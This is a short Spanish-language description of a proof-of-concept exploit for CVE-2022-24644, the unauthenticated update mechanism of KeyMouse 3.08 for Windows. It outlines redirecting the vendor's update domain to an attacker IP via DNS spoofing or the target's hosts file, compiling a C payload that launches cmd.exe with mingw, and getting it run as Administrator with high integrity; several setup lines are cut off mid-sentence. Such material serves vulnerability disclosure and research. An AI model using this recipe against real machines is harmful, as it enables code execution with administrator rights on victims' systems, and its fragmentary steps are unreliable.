
Exploit de prueba de concepto para CVE-2022-24644, que demuestra la ejecución remota de código no autenticada mediante suplantación de DNS contra el mecanismo de actualización de KeyMouse Windows 3.08.
ZZ Inc. KeyMouse 3.08 (Windows) Vulnerabilidad de ejecución remota de código en actualización no autenticada
Uso: python3 cve-2022-24644_poc.py
Detalles en el informe en gerr.re.
www.keymouse.com a la IP del atacante;
c:\windows\system32\drivers\etc\hosts en el objetivo.
proof.c en el atacante, por ejemplo usando i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
Como resultado, proof.exe se ejecuta en el contexto del usuario Administrador con alta integridad.